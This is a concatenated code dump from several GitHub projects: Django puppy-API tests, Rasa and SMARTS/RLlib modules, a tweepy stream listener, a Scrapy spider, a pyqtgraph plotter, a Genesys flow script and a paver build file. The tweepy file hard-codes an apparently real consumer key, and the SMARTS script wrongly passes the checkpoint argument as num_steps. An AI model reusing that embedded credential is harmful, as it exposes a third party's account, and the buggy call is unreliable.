name="Casper", age=3, breed="Bull Dog", color="Black"
)
self.muffin = Puppy.objects.create(
name="Muffin", age=1, breed="Gradane", color="Brown"
)
self.rambo = Puppy.objects.create(
name="Rambo", age=2, breed="Labrador", color="Black"
)
self.ricky = Puppy.objects.create(
name="Ricky", age=6, breed="Labrador", color="Brown"
)
def test_get_valid_single_puppy(self):
response = client.get(
reverse("get_delete_update_puppy", kwargs={"pk": self.rambo.pk})
)
puppy = Puppy.objects.get(pk=self.rambo.pk)
serializer = PuppySerializer(puppy)
self.assertEqual(response.data, serializer.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_invalid_single_puppy(self):
response = client.get(reverse("get_delete_update_puppy", kwargs={"pk": 30}))
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
class CreateNewPuppyTest(TestCase):
"""
Test module for inserting a new puppy.
"""
def setUp(self) -> None:
self.valid_payload = {
"name": "Muffin",
"age": 5,
"breed": "Pamerion",
"color": "White",
}
self.invalid_payload = {
"name": "",
"age": 4,
"breed": "Pamerion",
"color": "White",
}
def test_create_valid_puppy(self):
response = client.post(
reverse("get_post_puppies"),
data=json.dumps(self.valid_payload),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_invalid_puppy(self):
response = client.post(
reverse("get_post_puppies"),
data=json.dumps(self.invalid_payload),
content_type=("application/json"),
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
class UpdateSinglePuppyTest(TestCase):
"""
Test module for updating an existing puppy record
"""
def setUp(self) -> None:
self.casper = Puppy.objects.create(
name="Casper", age=3, breed="Bull Dog", color="Black"
)
self.muffin = Puppy.objects.create(
name="Muffy", age=1, breed="Gradane", color="Brown"
)
self.valid_payload = {
"name": "Muffy",
"age": 2,
"breed": "Labrador",
"color": "Black",
}
self.invalid_payload = {
"name": "",
"age": 4,
"breed": "Pamerion",
"color": "White",
}
def test_valid_update_puppy(self):
response = client.put(
reverse("get_delete_update_puppy", kwargs={"pk": self.muffin.pk}),
data=json.dumps(self.valid_payload),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_invalid_update_puppy(self):
response = client.put(
reverse("get_delete_update_puppy", kwargs={"pk": self.muffin.pk}),
data=json.dumps(self.invalid_payload),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
class DeleteSinglePuppyTest(TestCase):
"""
Test module for deleting an existing puppy record
"""
def setUp(self) -> None:
self.casper = Puppy.objects.create(
name="casper", age=3, breed="Bull Dog", color="Black"
)
self.muffin = Puppy.objects.create(
name="Muffy",
age=4,
breed="Gradane",
color="Brown",
)
def test_valid_delete_puppy(self):
response = client.delete(
reverse("get_delete_update_puppy", kwargs={"pk": self.muffin.pk}),
)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_invalid_delete_puppy(self):
response = client.delete(reverse("get_delete_update_puppy", kwargs={"pk": 30}))
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
```
|
{
"source": "jenish-cj/botnlufoodrest",
"score": 2
}
|
#### File: rasa_core/training_utils/story_graph.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import random
from collections import deque, defaultdict
import typing
from rasa_core.domain import Domain
from typing import List, Text, Dict, Optional
from rasa_core.interpreter import RegexInterpreter, NaturalLanguageInterpreter
from rasa_core import utils
if typing.TYPE_CHECKING:
from rasa_core.training_utils.dsl import StoryStep, Story, \
TrainingsDataExtractor
class StoryGraph(object):
def __init__(self, story_steps):
# type: (List[StoryStep]) -> None
self.story_steps = story_steps
self.step_lookup = {s.id: s for s in self.story_steps}
self.ordered_ids = StoryGraph.order_steps(story_steps)
def ordered_steps(self):
# type: () -> List[StoryStep]
"""Returns the story steps ordered by topological order of the DAG."""
return [self.get(step_id) for step_id in self.ordered_ids]
def get(self, step_id):
# type: (Text) -> Optional[StoryStep]
"""Looks a story step up by its id."""
return self.step_lookup.get(step_id)
def build_stories(self,
domain,
max_number_of_trackers=2000):
# type: (Domain, NaturalLanguageInterpreter, bool, int) -> List[Story]
"""Build the stories of a graph."""
from rasa_core.training_utils.dsl import STORY_START, Story
active_trackers = {STORY_START: [Story()]}
rand = random.Random(42)
for step in self.ordered_steps():
if step.start_checkpoint_name() in active_trackers:
# these are the trackers that reached this story step
# and that need to handle all events of the step
incoming_trackers = active_trackers[step.start_checkpoint_name()]
# TODO: we can't use tracker filter here to filter for
# checkpoint conditions since we don't have trackers.
# this code should rather use the code from the dsl.
if max_number_of_trackers is not None:
incoming_trackers = utils.subsample_array(
incoming_trackers, max_number_of_trackers, rand)
events = step.explicit_events(domain)
# need to copy the tracker as multiple story steps might
# start with the same checkpoint and all of them
# will use the same set of incoming trackers
if events:
trackers = [Story(tracker.story_steps + [step])
for tracker in incoming_trackers]
else:
trackers = [] # small optimization
# update our tracker dictionary with the trackers that handled
# the events of the step and that can now be used for further
# story steps that start with the checkpoint this step ended on
if step.end_checkpoint_name() not in active_trackers:
active_trackers[step.end_checkpoint_name()] = []
active_trackers[step.end_checkpoint_name()].extend(trackers)
return active_trackers[None]
def as_story_string(self):
story_content = ""
for step in self.story_steps:
story_content += step.as_story_string(flat=False)
return story_content
@staticmethod
def order_steps(story_steps):
# type: (List[StoryStep]) -> Deque[Text]
"""Topological sort of the steps returning the ids of the steps."""
checkpoints = StoryGraph._group_by_start_checkpoint(story_steps)
graph = {s.id: [other.id
for other in checkpoints[s.end_checkpoint_name()]]
for s in story_steps}
return StoryGraph.topological_sort(graph)
@staticmethod
def _group_by_start_checkpoint(story_steps):
# type: (List[StoryStep]) -> Dict[Text, List[StoryStep]]
"""Returns all the start checkpoint of the steps"""
checkpoints = defaultdict(list)
for step in story_steps:
checkpoints[step.start_checkpoint_name()].append(step)
return checkpoints
@staticmethod
def topological_sort(graph):
"""Creates a topsort of a directed graph. This is an unstable sorting!
The graph should be represented as a dictionary, e.g.:
>>> example_graph = {
... "a": ["b", "c", "d"],
... "b": [],
... "c": ["d"],
... "d": [],
... "e": ["f"],
... "f": []}
>>> StoryGraph.topological_sort(example_graph)
deque([u'e', u'f', u'a', u'c', u'd', u'b'])
"""
GRAY, BLACK = 0, 1
ordered = deque()
unprocessed = set(graph)
visited_nodes = {}
def dfs(node):
visited_nodes[node] = GRAY
for k in graph.get(node, ()):
sk = visited_nodes.get(k, None)
if sk == GRAY:
raise ValueError("Cycle found at node: {}".format(sk))
if sk == BLACK:
continue
unprocessed.discard(k)
dfs(k)
ordered.appendleft(node)
visited_nodes[node] = BLACK
while unprocessed:
dfs(unprocessed.pop())
return ordered
```
|
{
"source": "jenishmaharjan/big-data-python-class",
"score": 3
}
|
#### File: Streams/Code/tweetstream1.py
```python
from tweepy.streaming import StreamListener
from tweepy.auth import OAuthHandler
from tweepy import Stream
#Variables that contains the user credentials to access Twitter API
access_token = "<KEY>"
access_token_secret = "<KEY>"
consumer_key = "PeQ7nqZbgkDsLPYwUhZnCVmEc"
consumer_secret = "<KEY>"
# This is a basic listener that just prints received tweets to stdout.
class StdOutListener(StreamListener):
def on_data(self, data):
#file=open("TweetOut.txt","a")
#file.write(data)
print(data)
return True
def on_error(self, status):
print (status)
if __name__ == '__main__':
# This handles Twitter authetification and the connection to Twitter Streaming API
l = StdOutListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, l)
# This line filter Twitter Streams to capture data by the keywords: 'Tesla', 'Stock'
stream.filter(track=['Microsoft', 'Stock'])
```
#### File: datablogger_scraper/spiders/datablogger.py
```python
import scrapy
from datablogger_scraper.items import DatabloggerScraperItem
# -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractor import LinkExtractor
from scrapy.spiders import Rule, CrawlSpider
from datablogger_scraper.items import DatabloggerScraperItem
class DatabloggerSpider(CrawlSpider):
# The name of the spider
name = "datablogger"
# The domains that are allowed (links to other domains are skipped)
allowed_domains = ["data-blogger.com"]
# The URLs to start with
start_urls = ["https://www.data-blogger.com/"]
# This spider has one rule: extract all (unique and canonicalized) links, follow them and parse them using the parse_items method
rules = [
Rule(
LinkExtractor(
canonicalize=True,
unique=True
),
follow=True,
callback="parse_items"
)
]
# Method which starts the requests by visiting all URLs specified in start_urls
def start_requests(self):
for url in self.start_urls:
yield scrapy.Request(url, callback=self.parse, dont_filter=True)
# Method for parsing items
def parse_items(self, response):
# The list of items that are found on the particular page
items = []
# Only extract canonicalized and unique links (with respect to the current page)
links = LinkExtractor(canonicalize=True, unique=True).extract_links(response)
# Now go through all the found links
for link in links:
# Check whether the domain of the URL of the link is allowed; so whether it is in one of the allowed domains
is_allowed = False
for allowed_domain in self.allowed_domains:
if allowed_domain in link.url:
is_allowed = True
# If it is allowed, create a new item and add it to the list of found items
if is_allowed:
item = DatabloggerScraperItem()
item['link_from'] = response.url
item['link_to'] = link.url
items.append(item)
# Return all the found items
return items
```
|
{
"source": "JenishPatel99/SMARTS",
"score": 2
}
|
#### File: SMARTS/benchmark/evaluate.py
```python
import argparse
import ray
import collections
import gym
from pathlib import Path
from ray.rllib.policy.sample_batch import DEFAULT_POLICY_ID
from ray.rllib.env.base_env import _DUMMY_AGENT_ID
from ray.rllib.rollout import default_policy_agent_mapping, DefaultMapping
from ray.rllib.evaluation.worker_set import WorkerSet
from ray.rllib.env import MultiAgentEnv
from ray.rllib.utils.spaces.space_utils import flatten_to_single_ndarray
from smarts.core.agent import AgentSpec
from smarts.core.agent_interface import AgentInterface
from smarts.core.scenario import Scenario
from benchmark.agents import load_config
from benchmark.metrics import basic_metrics as metrics
def parse_args():
parser = argparse.ArgumentParser("Run evaluation")
parser.add_argument(
"scenario", type=str, help="Scenario name",
)
parser.add_argument("--checkpoint", type=str, required=True)
parser.add_argument("--num_steps", type=int, default=1000)
parser.add_argument("--num_episodes", type=int, default=10)
parser.add_argument(
"--paradigm",
type=str,
default="decentralized",
help="Algorithm paradigm, decentralized (default) or centralized",
)
parser.add_argument(
"--headless", default=False, action="store_true", help="Turn on headless mode"
)
parser.add_argument("--config_file", "-f", type=str, required=True)
return parser.parse_args()
def main(
scenario,
config_file,
checkpoint,
num_steps=1000,
num_episodes=10,
paradigm="decentralized",
headless=False,
):
scenario_path = Path(scenario).absolute()
agent_missions_count = Scenario.discover_agent_missions_count(scenario_path)
if agent_missions_count == 0:
agent_ids = ["default_policy"]
else:
agent_ids = [f"AGENT-{i}" for i in range(agent_missions_count)]
config = load_config(config_file, mode="evaluate")
agents = {
agent_id: AgentSpec(
**config["agent"], interface=AgentInterface(**config["interface"])
)
for agent_id in agent_ids
}
config["env_config"].update(
{
"seed": 42,
"scenarios": [str(scenario_path)],
"headless": headless,
"agent_specs": agents,
}
)
obs_space, act_space = config["policy"][1:3]
tune_config = config["run"]["config"]
if paradigm == "centralized":
config["env_config"].update(
{
"obs_space": gym.spaces.Tuple([obs_space] * agent_missions_count),
"act_space": gym.spaces.Tuple([act_space] * agent_missions_count),
"groups": {"group": agent_ids},
}
)
tune_config.update(config["policy"][-1])
else:
policies = {}
for k in agents:
policies[k] = config["policy"][:-1] + (
{**config["policy"][-1], "agent_id": k},
)
tune_config.update(
{
"multiagent": {
"policies": policies,
"policy_mapping_fn": lambda agent_id: agent_id,
}
}
)
ray.init()
trainer_cls = config["trainer"]
trainer_config = {"env_config": config["env_config"]}
if paradigm != "centralized":
trainer_config.update({"multiagent": tune_config["multiagent"]})
else:
trainer_config.update({"model": tune_config["model"]})
trainer = trainer_cls(env=tune_config["env"], config=trainer_config)
trainer.restore(checkpoint)
rollout(trainer, None, num_steps, num_episodes)
trainer.stop()
def rollout(trainer, env_name, num_steps, num_episodes=0):
""" Reference: https://github.com/ray-project/ray/blob/master/rllib/rollout.py
"""
policy_agent_mapping = default_policy_agent_mapping
if hasattr(trainer, "workers") and isinstance(trainer.workers, WorkerSet):
env = trainer.workers.local_worker().env
multiagent = isinstance(env, MultiAgentEnv)
if trainer.workers.local_worker().multiagent:
policy_agent_mapping = trainer.config["multiagent"]["policy_mapping_fn"]
policy_map = trainer.workers.local_worker().policy_map
state_init = {p: m.get_initial_state() for p, m in policy_map.items()}
use_lstm = {p: len(s) > 0 for p, s in state_init.items()}
else:
env = gym.make(env_name)
multiagent = False
try:
policy_map = {DEFAULT_POLICY_ID: trainer.policy}
except AttributeError:
raise AttributeError(
"Agent ({}) does not have a `policy` property! This is needed "
"for performing (trained) agent rollouts.".format(trainer)
)
use_lstm = {DEFAULT_POLICY_ID: False}
action_init = {
p: flatten_to_single_ndarray(m.action_space.sample())
for p, m in policy_map.items()
}
metrics_obj = metrics.Metric(num_episodes)
for episode in range(num_episodes):
mapping_cache = {} # in case policy_agent_mapping is stochastic
obs = env.reset()
agent_states = DefaultMapping(
lambda agent_id: state_init[mapping_cache[agent_id]]
)
prev_actions = DefaultMapping(
lambda agent_id: action_init[mapping_cache[agent_id]]
)
prev_rewards = collections.defaultdict(lambda: 0.0)
done = False
reward_total = 0.0
step = 0
while not done and step < num_steps:
multi_obs = obs if multiagent else {_DUMMY_AGENT_ID: obs}
action_dict = {}
for agent_id, a_obs in multi_obs.items():
if a_obs is not None:
policy_id = mapping_cache.setdefault(
agent_id, policy_agent_mapping(agent_id)
)
p_use_lstm = use_lstm[policy_id]
if p_use_lstm:
a_action, p_state, _ = trainer.compute_action(
a_obs,
state=agent_states[agent_id],
prev_action=prev_actions[agent_id],
prev_reward=prev_rewards[agent_id],
policy_id=policy_id,
)
agent_states[agent_id] = p_state
else:
a_action = trainer.compute_action(
a_obs,
prev_action=prev_actions[agent_id],
prev_reward=prev_rewards[agent_id],
policy_id=policy_id,
)
a_action = flatten_to_single_ndarray(a_action)
action_dict[agent_id] = a_action
prev_actions[agent_id] = a_action
action = action_dict
action = action if multiagent else action[_DUMMY_AGENT_ID]
next_obs, reward, done, info = env.step(action)
metrics_obj.log_step(multi_obs, reward, done, info, episode=episode)
if multiagent:
for agent_id, r in reward.items():
prev_rewards[agent_id] = r
else:
prev_rewards[_DUMMY_AGENT_ID] = reward
# filter dead agents
if multiagent:
next_obs = {
agent_id: obs
for agent_id, obs in next_obs.items()
if not done[agent_id]
}
if multiagent:
done = done["__all__"]
reward_total += sum(reward.values())
else:
reward_total += reward
step += 1
obs = next_obs
print("\nEpisode #{}: steps: {} reward: {}".format(episode, step, reward_total))
if done:
episode += 1
print("\n metrics: {}".format(metrics_obj.compute()))
if __name__ == "__main__":
args = parse_args()
main(
scenario=args.scenario,
config_file=args.config_file,
checkpoint=args.checkpoint,
num_steps=args.checkpoint,
num_episodes=args.num_episodes,
paradigm=args.paradigm,
headless=args.headless,
)
```
#### File: wrappers/rllib/wrapper.py
```python
import copy
from ray.rllib.env.multi_agent_env import MultiAgentEnv
class Wrapper(MultiAgentEnv):
def __init__(self, config):
base_env_cls = config["base_env_cls"]
self.env = base_env_cls(config)
self._agent_keys = list(config["agent_specs"].keys())
self._last_observations = {k: None for k in self._agent_keys}
def _get_observations(self, observations):
return observations
def _get_rewards(self, last_observations, observations, rewards):
return rewards
def _get_infos(self, observations, rewards, infos):
return infos
def _update_last_observation(self, observations):
for agent_id, obs in observations.items():
self._last_observations[agent_id] = copy.copy(obs)
def step(self, agent_actions):
return self.env.step(agent_actions)
def reset(self, **kwargs):
return self.env.reset(**kwargs)
def close(self):
self.env.close()
```
|
{
"source": "jenish-rudani/fast-moving-graph",
"score": 3
}
|
#### File: jenish-rudani/fast-moving-graph/main.py
```python
import random
import pyqtgraph as pg
from collections import deque
from pyqtgraph.Qt import QtGui, QtCore
from signal import pause
from threading import Thread
from queue import Queue
import signal
def keyBoardInterruptHandler(signal, frame):
global wObj
print("Signal Caught")
wObj.exit()
signal.signal(signal.SIGTERM, keyBoardInterruptHandler)
signal.signal(signal.SIGINT, keyBoardInterruptHandler)
app = QtGui.QApplication([])
win = pg.GraphicsWindow()
class Graph:
def __init__(self, ):
self.numberofTags = 10
self.count = 0
self.maxLen = 1000 # max number of data points to show on graph
self.db = {}
self.tagCounter = 0
self.running = True
self.app = app
self.win = win
self.q = [Queue() for i in range(10)]
self.dat = [deque() for i in range(10)]
self.plotHandler = None
self.curveHandler = [None for i in range(10)]
self.colorList = ["#803723", "#1ff2ed", "#00fa5c",
"#aff0ed", "#f1af00", "#803723", "#8025ab", "#baa4a4", "#00cc99", "#990099"]
self.initPlotHandler()
self.graphUpdateSpeedMs = 40
self.timer = QtCore.QTimer() # to create a thread that calls a function at intervals
self.timer.timeout.connect(self.update)
self.timer.start(self.graphUpdateSpeedMs)
def initPlotHandler(self):
for i in range(10):
self.plotHandler = self.win.addPlot()
self.plotHandler.setYRange(-20, -70, padding=0.02)
self.plotHandler.setXRange(0, self.maxLen, padding=0.1)
self.win.nextRow()
color = self.colorList[i]
self.curveHandler[i] = self.plotHandler.plot(pen=pg.mkPen(color))
def update(self):
for i in range(len(self.db.keys())):
if len(self.dat[i]) > self.maxLen:
self.dat[i].popleft()
try:
self.dat[i].append(self.q[i].get(block=False))
self.curveHandler[i].setData(self.dat[i])
except Exception:
self.curveHandler[i].setData(self.dat[i])
self.app.processEvents()
def yt(self, tag_id, rssi):
print("Count {} | Tag Detected : {} | RSSI : {}".format(
self.count, tag_id, rssi))
if tag_id not in self.db:
print("Not in database")
self.db[tag_id] = self.tagCounter
self.tagCounter += 1
self.count += 1
n = self.db[tag_id]
if len(self.dat[n]) > self.maxLen:
self.dat[n].popleft()
self.dat[n].append(rssi)
self.curveHandler[n].setData(self.dat[n])
self.app.processEvents()
def randomDataGenerator(self):
a = ['111', '222', '333', '444', '555', '666', '777', '888', '999', '000']
while self.running:
randomIndex = random.randint(0, 9)
temp = -random.randint(15, 55)
tag = a[randomIndex]
self.yt(tag, temp)
def exit(self):
self.running = False
import time
time.sleep(1)
QtGui.QApplication.closeAllWindows()
def main(self):
print("Starting Reading")
self.randomDataGenerator()
print("Reading Stopped")
if __name__ == '__main__':
try:
a = QtGui.QApplication.instance()
wObj = Graph()
T1 = Thread(target=wObj.main)
T1.daemon = True
T1.start()
a.exec_()
except Exception as e:
print(e)
```
|
{
"source": "jenissabarrera/email-aws-comprehend-blueprint",
"score": 2
}
|
#### File: email_flow/scripts/manage_flow.py
```python
import subprocess
import sys
import os
import time
import PureCloudPlatformClientV2
SCRIPT_PATH = sys.path[0]
CLIENT_ID = os.environ["GENESYSCLOUD_OAUTHCLIENT_ID"]
CLIENT_SECRET = os.environ["GENESYSCLOUD_OAUTHCLIENT_SECRET"]
CLIENT_REGION = os.environ["GENESYSCLOUD_REGION"]
CLIENT_REGION = os.environ["GENESYSCLOUD_ARCHY_REGION"]
CLIENT_API_REGION = os.environ["GENESYSCLOUD_API_REGION"]
PureCloudPlatformClientV2.configuration.host = CLIENT_API_REGION
apiClient = PureCloudPlatformClientV2.api_client.ApiClient().get_client_credentials_token(CLIENT_ID, CLIENT_SECRET)
architectApi = PureCloudPlatformClientV2.ArchitectApi(apiClient)
routingApi = PureCloudPlatformClientV2.RoutingApi(apiClient)
ACTION = sys.argv[1]
TARGET_DOMAIN = sys.argv[2]
TARGET_DOMAIN_NAME = sys.argv[3]
def deleteEmailRoute():
print("\nDeleting email route for target domain: \n")
results = routingApi.get_routing_email_domain_routes(TARGET_DOMAIN)
if len(results.entities)>0:
routeId = results.entities[0].id
routingApi.delete_routing_email_domain(routeId)
print("Successfully deleted email route for target domain: {}".format(TARGET_DOMAIN))
def findFlowId():
print("Finding flow id for EmailAWSComprehend flow\n")
results = architectApi.get_flows(name_or_description="EmailAWSComprehendFlow")
flowId = results.entities[0].id
print("Flow id found for EmailAWSComprehend flow: {}\n".format(flowId))
return flowId
def createEmailRoute():
flowId = findFlowId()
print("Creating email route 'support' for flow id: {}\n".format(flowId))
body = PureCloudPlatformClientV2.InboundRoute()
flow = PureCloudPlatformClientV2.DomainEntityRef()
flow.id=flowId
body.pattern="support"
body.from_name="Financial Services Support"
body.from_email= "support@" + TARGET_DOMAIN + "." + TARGET_DOMAIN_NAME
body.flow=flow
routingApi.post_routing_email_domain_routes(TARGET_DOMAIN + "." + TARGET_DOMAIN_NAME,body)
print("Email route 'support' created for flow id: {}\n".format(flowId))
def createArchyFlow():
print("Creating Archy flow \n")
cmd = "archy publish --forceUnlock --file={}/EmailComprehendFlow.yaml --clientId {} --clientSecret {} --location {} --overwriteResultsFile --resultsFile {}/output/results.json".format(
SCRIPT_PATH, CLIENT_ID, CLIENT_SECRET, CLIENT_REGION, SCRIPT_PATH
)
time.sleep(10)
subprocess.run(cmd, shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, check=True)
time.sleep(10)
flowId = findFlowId()
print("Archy flow created with flow id: {}\n".format(flowId))
def deleteArchyFlow():
flowId = findFlowId()
time.sleep(20.0)
architectApi.delete_flow(flowId)
print("Archy flow {} deleted\n".format(flowId))
if ACTION == "CREATE":
deleteEmailRoute()
createArchyFlow()
createEmailRoute()
if ACTION == "DELETE":
deleteEmailRoute()
deleteArchyFlow()
```
|
{
"source": "jenisys/behave",
"score": 2
}
|
#### File: jenisys/behave/pavement.py
```python
from paver.easy import *
import os
import sys
sys.path.insert(0, ".")
# -- USE PAVER EXTENSIONS: tasks, utility functions
# from paver.setuputils import setup, install_distutils_tasks
# import paver.doctools
from paver_ext.pip_download import download_deps, localpi
from paver_ext.python_checker import pychecker, pylint
from paver_ext.paver_consume_args import Cmdline
from paver_ext import paver_require, paver_patch
paver_require.min_version("1.2")
paver_patch.ensure_path_with_pmethods(path)
paver_patch.ensure_path_with_smethods(path)
# -- REQUIRED-FOR: setup, sdist, ...
# NOTE: Adds a lot more python-project related tasks.
# install_distutils_tasks()
# ----------------------------------------------------------------------------
# TASK CONFIGURATION:
# ----------------------------------------------------------------------------
NAME = "behave"
options(
sphinx=Bunch(
docroot="docs",
sourcedir=".",
builddir="../build/docs"
),
minilib=Bunch(
extra_files=[ 'doctools', 'virtual' ]
),
behave_test=Bunch(
default_args=[
"features/",
"tools/test-features/",
"selftest.features/",
"issue.features/",
]
),
pychecker = Bunch(
default_args=NAME
),
pylint = Bunch(
default_args=NAME
),
clean = Bunch(
dirs = [
".cache",
".tox", #< tox build subtree.
"__WORKDIR__", #< behave_test tempdir.
"build", "dist", #< python setup temporary build dir.
"tmp",
"reports", #< JUnit TESTS-*.xml (default directory).
"test_results",
],
files = [
".coverage",
"paver-minilib.zip",
],
walkdirs_patterns = [
"*.egg-info",
"__pycache__",
],
walkfiles_patterns = [
"*.pyc", "*.pyo", "*$py.class",
"*.bak", "*.log", "*.tmp",
".coverage", ".coverage.*",
"pylint_*.txt", "pychecker_*.txt",
"xxx*.*", "testrun*.json",
".DS_Store", "*.~*~", #< MACOSX
],
),
pip = Bunch(
requirements_files=[
"requirements.txt",
"requirements-develop.txt",
],
# download_dir="downloads",
download_dir= path("$HOME/.pip/downloads").expandvars(),
),
)
# ----------------------------------------------------------------------------
# TASKS:
# ----------------------------------------------------------------------------
@task
@consume_args
def docs(args):
"""
USAGE: paver docs [BUILDER]
Generate the documentation with sphinx (via sphinx-build).
Available builder: html, pdf, ... (default: html)
"""
# -- PREPROCESS: Separate builders/args and options
cmdline = Cmdline.consume(args, default_args=["html"])
cmdopts = cmdline.join_options()
# -- STEP: Build the docs.
for builder in cmdline.args:
sphinx_build(builder, cmdopts=cmdopts)
@task
def linkcheck():
"""Check hyperlinks in documentation."""
sphinx_build("linkcheck")
# ----------------------------------------------------------------------------
# TASK: test
# ----------------------------------------------------------------------------
@task
@consume_args
def test(args):
"""Execute all tests (unittests, feature tests)."""
call_task("unittest")
call_task("behave_test")
@task
@consume_args
def unittest(args):
"""Execute all unittests w/ nosetest runner."""
cmdline = Cmdline.consume(args)
nosetests(cmdline.join_args(), cmdopts=cmdline.join_options())
@task
@consume_args
def behave_test(args, options):
"""Execute all feature tests w/ behave."""
cmdline = Cmdline.consume(args, default_args=options.default_args)
if not cmdline.options:
excluded_tags = "--tags=-xfail --tags=-not_supported"
cmdopts = "-f progress {0}".format(excluded_tags)
else:
cmdopts = cmdline.join_options()
# -- STEP: Collect test groups.
test_groups = []
for prefix in options.default_args:
test_group = []
for arg in cmdline.args:
if arg.startswith(prefix):
test_group.append(arg)
if test_group:
test_groups.append(test_group)
# -- RUN TESTS: All tests at once.
for test_group in test_groups:
args = " ".join(test_group)
behave(args, cmdopts)
# -- RUN TESTS: All tests at once.
# for arg in cmdline.args:
# behave(arg, cmdopts)
# arg = " ".join(args)
# behave(arg, cmdopts)
# ----------------------------------------------------------------------------
# TASK: test coverage
# ----------------------------------------------------------------------------
@task
def coverage_report():
"""Generate coverage report from collected coverage data."""
sh("coverage combine")
sh("coverage report")
sh("coverage html")
info("WRITTEN TO: build/coverage.html/")
# -- DISABLED: sh("coverage xml")
@task
@consume_args
def coverage(args):
"""Run unittests and collect coverage, then generate report."""
cmdline = Cmdline.consume(args)
unittests = [ arg for arg in cmdline.args if arg.startswith("test") ]
behave_tests = [ arg for arg in cmdline.args if not arg.startswith("test") ]
# -- STEP: Check if all tests should be run (normally: no args provided).
should_always_run = not unittests and not behave_tests
if should_always_run:
behave_tests = list(options.behave_test.default_args)
# -- STEP: Run unittests.
if unittests or should_always_run:
nosetests_coverage_run(" ".join(unittests))
# -- STEP: Run feature-tests.
# behave = path("bin/behave").normpath()
if behave_tests or should_always_run:
cmdopts = "-f progress --tags=-xfail "+ cmdline.join_options()
for behave_test_ in behave_tests:
behave_coverage_run(behave_test_, cmdopts=cmdopts)
# -- ALTERNATIVE:
# coverage_run("{behave} --format=progress {cmdopts} {args}".format(
# behave=behave, args=behave_test_, cmdopts=cmdopts))
# -- FINALLY:
call_task("coverage_report")
# ----------------------------------------------------------------------------
# TASK: bump_version
# ----------------------------------------------------------------------------
@task
def bump_version(info, error):
"""Update VERSION.txt"""
try:
from behave import __version__ as VERSION
info("VERSION: %s" % VERSION)
file_ = open("VERSION.txt", "w+")
file_.write("%s\n" % VERSION)
file_.close()
except StandardError, e:
error("Update VERSION.txt FAILED: %s" % e)
# ----------------------------------------------------------------------------
# TASK: clean
# ----------------------------------------------------------------------------
@task
def clean(options):
"""Cleanup the project workspace."""
for dir_ in options.dirs:
path(dir_).rmtree_s()
for pattern in options.walkdirs_patterns:
dirs = path(".").walkdirs(pattern, errors="ignore")
for dir_ in dirs:
dir_.rmtree()
for file_ in options.files:
path(file_).remove_s()
for pattern in options.walkfiles_patterns:
files = path(".").walkfiles(pattern)
for file_ in files:
file_.remove()
# ----------------------------------------------------------------------------
# XML TASKS:
# ----------------------------------------------------------------------------
@task
@consume_args
def junit_validate(args):
"""Validate JUnit report *.xml files with xmllint."""
if not args:
args = [ "reports" ]
# -- PREPROCESS ARGS:
files = []
for arg in args:
path_ = path(arg)
if "*" in arg:
files.extend(path(".").glob(arg))
elif path_.isdir():
files.extend(path_.glob("*.xml"))
else:
files.append(arg)
# -- VALIDATE XML FILES:
xml_schema = "etc/junit.xml/behave_junit.xsd"
problematic = []
for arg in files:
try:
xmllint(arg, schema=xml_schema, options="")
except BuildFailure:
# -- KEEP-GOING: Collect failure and continue. Report errors later.
problematic.append(arg)
# -- SUMMARY:
if problematic:
message = "{0} file(s) with XML validation errors.\n".format(len(problematic))
message += "PROBLEMATIC FILES:\n {0}".format("\n ".join(problematic))
raise BuildFailure(message)
else:
info("SUMMARY: {0} XML file(s) validated.".format(len(files)))
# ----------------------------------------------------------------------------
# PLATFORM-SPECIFIC TASKS: win32
# ----------------------------------------------------------------------------
#if sys.platform == "win32":
# @task
# @consume_args
# def py2exe(args):
# """Run py2exe to build a win32 executable."""
# cmdline = " ".join(args)
# python("setup_py2exe.py py2exe %s" % cmdline)
#
# ----------------------------------------------------------------------------
# UTILS:
# ----------------------------------------------------------------------------
BEHAVE = path("bin/behave").normpath()
XMLLINT = "xmllint"
def python(cmdline, cwd="."):
"""Execute a python script by using the current python interpreter."""
return sh("{python} {cmd}".format(python=sys.executable, cmd=cmdline),
cwd=cwd)
def coverage_run(cmdline):
return sh("coverage run {cmdline}".format(cmdline=cmdline))
# ignore_error=True) #< Show coverage-report even if tests fail.
def nosetests(cmdline, cmdopts=""):
"""Run nosetest command"""
return sh("nosetests {options} {args}".format(options=cmdopts, args=cmdline))
def nosetests_coverage_run(cmdline, cmdopts=""):
"""Collect coverage w/ nose-builtin coverage plugin."""
cmdopts += " --with-coverage --cover-package={package}".format(package=NAME)
return nosetests(cmdline, cmdopts)
def nosetests_coverage_run2(cmdline, cmdopts=""):
"""Collect coverage w/ extra nose-cov plugin."""
cmdopts += " --with-cov --cov={package}".format(package=NAME)
return nosetests(cmdline, cmdopts)
def behave(cmdline, cmdopts=""):
"""Run behave command"""
return sh("{behave} {options} {args}".format(
behave=BEHAVE, options=cmdopts, args=cmdline))
def behave_coverage_run(cmdline, cmdopts=""):
"""Collect coverage w/ behave."""
os.environ["COVERAGE_PROCESS_START"] = path(".coveragerc").abspath()
return behave(cmdline, cmdopts)
def sphinx_build(builder="html", cmdopts=""):
if builder.startswith("-"):
cmdopts += " %s" % builder
builder = ""
sourcedir = options.sphinx.sourcedir
destdir = options.sphinx.builddir
cmd = "sphinx-build {opts} -b {builder} {sourcedir} {destdir}/{builder}"\
.format(builder=builder, sourcedir=sourcedir,
destdir=destdir, opts=cmdopts)
sh(cmd, cwd=options.sphinx.docroot)
def xmllint(cmdline, options=None, schema=None):
if not options:
options = ""
if schema:
options = " --schema {0} {1}".format(schema, options)
cmd = "{xmllint} {options} {cmdline}".format(
xmllint=XMLLINT, options=options, cmdline=cmdline)
sh(cmd, capture=True) #< SILENT: Output only in case of BuildError
class Cmdline(object):
def __init__(self, args=None, options=None):
self.args = args or []
self.options = options or []
